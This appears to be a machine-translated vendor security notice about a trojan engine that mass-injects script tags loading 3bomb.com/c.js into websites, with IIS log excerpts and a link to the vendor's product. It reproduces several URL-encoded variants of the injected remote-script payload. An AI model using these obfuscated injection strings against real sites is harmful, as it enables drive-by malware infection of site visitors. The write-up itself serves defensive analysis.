Recently, a new Trojan engine began to appear. Google was used to search for COM/C. js.16,200Websites are infected with Trojans.
The security umbrella research is as follows:
The trojan engine keeps submitting Trojan code through web crawling technology, mainly including % D3 % Aa % D1 % F8 <SCRIPT % 20src = http: // 3bomb. % 63% 6fm/C. JS> </SCRIPT>
The middle part is constantly deformed.
<SCRIPT % 20src = http: // 3B % 6f % 6 dbcom/C. js> </SCRIPT>
<SCRIPT % 20src = http: // % 33bomb.com/c.js> </SCRIPT>
The IIS log is as follows:
09:18:25 w3svc9 221.130.199.26 get/Xueyuan/list2.aspx name = % B2 % DF % C2 % D4 % 3 cscript + SRC % 3 dhttp % 3A % 2f % 2f3b % 256f % 256db.com % 2fc. js % 3E % 3C % 2 fscript % 3E 80-72.30.142.159 Mozilla/5.0 + (compatible; + Yahoo! + Slurp; + http://help.yahoo.com/help/us/ysearch/slurp) 302 0
11:37:41 w3svc9 221.130.199.26 get/uploadfiles/debc07d3-3ccb-4676-ad90-144be37027e5.gif <SCRIPT + src = http:/3bomb.com/c.js> </SCRIPT> <SCRIPT + src = http: /3bomb.com/c.js> </SCRIPT>-80-221.239.165.30 Mozilla/4.0 + (compatible; + MSIE + 7.0; + windows + nt + 5.1) 302 0 0
11:37:41 w3svc9 221.130.199.26 get/uploadfiles/templates <SCRIPT + src = http:/3bomb.com/c.js> </SCRIPT> <SCRIPT + src = http: /3bomb.com/c.js> </SCRIPT>-80-221.239.165.30 Mozilla/4.0 + (compatible; + MSIE + 7.0; + windows + nt + 5.1) 302 0 0
11:37:41 w3svc9 221.130.199.26 get/xcg/images/top_search.jpg-80-221.239.165.30 Mozilla/4.0 + (compatible; + MSIE + 7.0; + windows + nt + 5.1) 200 0 0
11:37:41 w3svc9 221.130.199.26 get/uploadfiles/new_34528523.jpg-80-116.5.162.127 Mozilla/4.0 + (compatible; + MSIE + 6.0; + windows + nt + 5.1; + sv1) 200 0 0
11:37:41 w3svc9 221.130.199.26 get/uploadfiles/templates <SCRIPT + src = http:/3bomb.com/c.js> </SCRIPT> <SCRIPT + src = http: /3bomb.com/c.js> </SCRIPT>-80-221.239.165.30 Mozilla/4.0 + (compatible; + MSIE + 7.0; + windows + nt + 5.1) 302 0 0
11:37:42 w3svc9 221.130.199.26 get/uploadfiles/86181994-719e-440e-abc6-2e7e834b3ebc.gif <SCRIPT + src = http:/3bomb.com/c.js> </SCRIPT> <SCRIPT + src = http: /3bomb.com/c.js> </SCRIPT>-80-221.239.165.30 Mozilla/4.0 + (compatible; + MSIE + 7.0; + windows + nt + 5.1) 302 0 0
11:37:42 w3svc9 221.130.199.26 get/uploadfiles/templates <SCRIPT + src = http:/3bomb.com/c.js> </SCRIPT> <SCRIPT + src = http: /3bomb.com/c.js> </SCRIPT>-80-221.239.165.30 Mozilla/4.0 + (compatible; + MSIE + 7.0; + windows + nt + 5.1) 302 0 0
11:37:42 w3svc9 221.130.199.26 get/uploadfiles/db7ed03e-0308-4a0f-9e82-86552f350f2f.gif <SCRIPT + src = http:/3bomb.com/c.js> </SCRIPT> <SCRIPT + src = http: /3bomb.com/c.js> </SCRIPT>-80-221.239.165.30 Mozilla/4.0 + (compatible; + MSIE + 7.0; + windows + nt + 5.1) 302 0 0
11:37:42 w3svc9 221.130.199.26 get/uploadfiles/templates <SCRIPT + src = http:/3bomb.com/c.js> </SCRIPT> <SCRIPT + src = http: /3bomb.com/c.js> </SCRIPT>-80-221.239.165.30 Mozilla/4.0 + (compatible; + MSIE + 7.0; + windows + nt + 5.1) 302 0 0
11:37:42 w3svc9 221.130.199.26 get/uploadfiles/e9928c0c-d27f-45ba-b873-09bbde17f58e.gif <SCRIPT + src = http:/3bomb.com/c.js> </SCRIPT> <SCRIPT + src = http: /3bomb.com/c.js> </SCRIPT>-80-221.239.165.30 Mozilla/4.0 + (compatible; + MSIE + 7.0; + windows + nt + 5.1) 302 0 0
11:37:42 w3svc9 221.130.199.26 get/uploadfiles/templates <SCRIPT + src = http:/3bomb.com/c.js> </SCRIPT> <SCRIPT + src = http: /3bomb.com/c.js> </SCRIPT>-80-221.239.165.30 Mozilla/4.0 + (compatible; + MSIE + 7.0; + windows + nt + 5.1) 302 0 0
21:07:14 w3svc9 221.130.199.26 get/food/list. aspx Title = % BD % a1 % BF % B5 <SCRIPT % 20src = http: // 3B % 6f % 6db.com/c.js> </SCRIPT> <SCRIPT % 20src = http: // % 33bomb.com/c.js> </SCRIPT> 80-2018.0.179.83 Mozilla/5.0 + (compatible; + Yahoo! + Slurp + China; + http://misc.yahoo.com.cn/help.html) 302 0
This trojan uses cookies, get, and post to inject Trojans and uses search engines to automatically search for and inject websites. It is a bit of a worm.
Security umbrella 2009 Enterprise Edition can effectively solve problems similar to disguised Injection
Download: http://safe3wp.safe3.com.cn/download.htm